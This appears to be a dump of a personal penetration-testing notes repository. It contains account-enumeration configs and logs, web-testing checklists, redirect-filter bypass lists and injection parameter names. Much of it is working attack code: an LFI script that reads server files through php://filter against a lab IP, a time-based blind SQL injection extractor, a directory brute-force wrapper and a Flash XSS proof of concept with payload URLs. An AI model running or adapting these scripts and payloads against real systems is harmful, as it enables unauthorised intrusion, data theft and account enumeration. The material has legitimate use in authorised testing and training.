08/10/2012 16 | 1 17 | CJR 18 | email 19 | 20 | 21 | Yahoo (ymail.com email) 22 | @ymail.com&ApiName=ValidateFields&intl=us]]> 23 | GET 24 | Accept-Language: en-gb 25 | "ErrorCode":"100000" 26 | "ResultCode":"SUCCESS" 27 | Empty response from server 28 | Blocking reported using this module, wait time suggested 29 | 08/10/2012 30 | 1 31 | CJR 32 | email 33 | 34 | 35 | Yahoo (rocketmail.com email) 36 | @rocketmail.com&ApiName=ValidateFields&intl=us]]> 37 | GET 38 | Accept-Language: en-gb 39 | "ErrorCode":"100000" 40 | "ResultCode":"SUCCESS" 41 | Empty response from server 42 | Blocking reported using this module, wait time suggested 43 | 08/10/2012 44 | 1 45 | CJR 46 | email 47 | 48 | 49 | Yahoo (yahoo.co.uk email) 50 | @yahoo.co.uk&ApiName=ValidateFields&intl=uk]]> 51 | GET 52 | Accept-Language: en-gb 53 | "ErrorCode":"100000" 54 | "ResultCode":"SUCCESS" 55 | Empty response from server 56 | Blocking reported using this module, wait time suggested 57 | 08/10/2012 58 | 1 59 | CJR 60 | email 61 | 62 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/scythe.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/social_engineering/tools/scythe/scythe.ico -------------------------------------------------------------------------------- /social_engineering/tools/scythe/scythe_0.2.8.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/social_engineering/tools/scythe/scythe_0.2.8.exe -------------------------------------------------------------------------------- /social_engineering/tools/scythe/test.log: -------------------------------------------------------------------------------- 1 | Account exampleuser exists on facebook.com 2 | Account testuser exists on facebook.com 3 | Account test123 exists on facebook.com 4 | Account chris exists on facebook.com 5 | Account bill exists on facebook.com 6 | Account jimmy exists on facebook.com 7 | Account peter exists on facebook.com 8 | -------------------------------------------------------------------------------- /templates/PWKv1-REPORT.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/templates/PWKv1-REPORT.doc -------------------------------------------------------------------------------- /templates/pwkv1_report.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/templates/pwkv1_report.doc -------------------------------------------------------------------------------- /web_pentest/auxiliary_info.md: -------------------------------------------------------------------------------- 1 | # Auxiliary 2 | 3 | ## The vulns formerly known as “noise” 4 | 5 | - Content Spoofing or HTML injection 6 | - Referer leakage 7 | - security headers 8 | - path disclosure 9 | - clickjacking 10 | - ++ 11 | 12 | ## How to test a web app in n minute 13 | 14 | How can you get maximum results within a given time window? 15 | 16 | ## Data Driven Assessment (diminishing return FTW) 17 | 18 | 1. Visit the search, registration, contact, password reset, and comment forms and hit them with your polyglot strings 19 | 2. Scan those specific functions with Burp’s built-in scanner 20 | 3. Check your cookie, log out, check cookie, log in, check cookie. Submit old cookie, see if access. 21 | 4. Perform user enumeration checks on login, registration, and password reset. 22 | 5. Do a reset and see if; the password comes plaintext, uses a URL based token, is predictable, can be used multiple times, or logs you in automatically 23 | 6. Find numeric account identifiers anywhere in URLs and rotate them for context change 24 | 7. Find the security-sensitive function(s) or files and see if vulnerable to non-auth browsing (idors), lower-auth browsing, CSRF, CSRF protection bypass, and see if they can be done over HTTP. 25 | 8. Directory brute for top short list on SecLists 26 | 9. Check upload functions for alternate file types that can execute code (xss or php/etc/etc) 27 | -------------------------------------------------------------------------------- /web_pentest/file_upload.md: -------------------------------------------------------------------------------- 1 | # Tactical Fuzzing - FI & Uploads 2 | 3 | ## Local file inclusion 4 | 5 | Core Idea: Does it (or can it) interact with the server file system? 6 | 7 | [Liffy] (https://github.com/rotlogix/liffy) is new and cool here but you can also use [Seclists] (https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/JHADDIX_LFI.txt): 8 | 9 | ## Malicious File Upload 10 | 11 | This is an important and common attack vector in this type of testing. 12 | A file upload functions need a lot of protections to be adequately secure. 13 | 14 | Attacks: 15 | - Upload unexpected file format to achieve code exec (swf, html, php, php3, aspx, ++) Web shells or... 16 | - Execute XSS via same types of files. Images as well! 17 | - Attack the parser to DoS the site or XSS via storing payloads in metadata or file header 18 | - Bypass security zones and store malware on target site via file polyglots 19 | 20 | File upload attacks are a whole presentation. Try this one to get a feel for bypass techniques: 21 | - content type spoofing 22 | - extension trickery 23 | - [File in the hole! presentaion] (https://www.nds.rub.de/media/attachments/files/2012/11/File-in-the-hole.pdf) 24 | 25 | As referenced file polyglots can be used to store malware on servers! 26 | [See @dan_crowley ‘s talk] (http://goo.gl/pquXC2) 27 | [and @angealbertini research:] (corkami.com) 28 | 29 | ## Remote file includes and redirects 30 | 31 | Look for any param with another web address in it. Same params from LFI can present here too. 32 | 33 | Common blacklist bypasses: 34 | 35 | - escape "/" with "\/" or “//” with “\/\/” 36 | - try single "/" instead of "//" 37 | - remove http i.e. "continue=//google.com" 38 | - “/\/\” , “|/” , “/%09/” 39 | - encode, slashes 40 | - ”./” CHANGE TO “..//” 41 | - ”../” CHANGE TO “....//” 42 | - ”/” CHANGE TO “//” 43 | 44 | Redirections Common Parameters or Injection points: 45 | - dest= 46 | - continue= 47 | - redirect= 48 | - url= (or anything with “url” in it) 49 | - uri= (same as above) 50 | - window= 51 | - next= 52 | 53 | RFI Common Parameters or Injection points: 54 | - File= 55 | - document= 56 | - Folder= 57 | - root= 58 | - Path= 59 | - pg= 60 | - style= 61 | - pdf= 62 | - template= 63 | - php_path= 64 | - doc= 65 | -------------------------------------------------------------------------------- /web_pentest/scripts/dir_run_gobuster.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "" 3 | go run main.go -u $1 -t 25 -k -w ../SecLists-master/Discovery/Web_Content/raft-large-directories-lowercase.txt -s 200 -fw -q -e 4 | go run main.go -u $1 -t 25 -k -w ../SecLists-master/Discovery/Web_Content/raft-large-files-lowercase.txt -s 200 -fw -q -e 5 | #go run main.go -u $1 -t 50 -k -w ../Top100000-RobotsDisallowed2.txt -s 200 -fw 6 | echo "" 7 | -------------------------------------------------------------------------------- /web_pentest/scripts/lfi_infile.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import base64 4 | 5 | 6 | while True: 7 | 8 | file = raw_input('$ ') 9 | resp = requests.get("http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=" + file) 10 | print resp.text 11 | m = re.search('(?<=\[\().*?(?=\)\])', resp.text) 12 | try: 13 | print base64.b64decode(m.group(0)) 14 | except: 15 | 'file does not exist or no permissions' 16 | -------------------------------------------------------------------------------- /web_pentest/scripts/sqli_timebased.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | 4 | chars = "abcdefghijklmnopqrstuvwxyz123456789*!$#/|&" 5 | 6 | for n in range(10): 7 | 8 | for i in range(1,21): 9 | 10 | for char in chars: 11 | r = requests.get("https://domain/ajs.php?buc=439'and+(select+sleep(10)+from+dual+where+\ 12 | substring((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()\ 13 | +limit+"+str(n)+",1),"+str(i)+",1)+like+'"+char+"')--+-") 14 | 15 | 16 | secs = r.elapsed.total_seconds() 17 | 18 | if secs > 10: 19 | print char, 20 | 21 | print "\n" 22 | -------------------------------------------------------------------------------- /web_pentest/xss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/web_pentest/xss.png -------------------------------------------------------------------------------- /web_pentest/xss_actionscript: -------------------------------------------------------------------------------- 1 | package 2 | { 3 | import flash.display.Sprite; 4 | import flash.external.*; 5 | import flash.system.System; 6 | public class XSSProject extends Sprite 7 | { 8 | public function XSSProject() 9 | { 10 | flash.system.Security.allowDomain("*"); 11 | ExternalInterface.marshallExceptions = true; 12 | try { 13 | ExternalInterface.call("0);}catch(e){};"+root.loaderInfo.parameters.js+"///*PoC by Soroush Dalili @IRSDL - only for testing/educational purposes - He accepts no responsibility for any bad/malicious usage*/"); 14 | } catch(e:Error) { 15 | trace(e); 16 | } 17 | } 18 | } 19 | } 20 | 21 | 22 | 23 | ------ 24 | 25 | https://dl.dropboxusercontent.com/u/37776965/exessess.swf 26 | 27 | Examples: 28 | 29 | Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); 30 | 31 | IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} 32 | 33 | IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); 34 | --------------------------------------------------------------------------------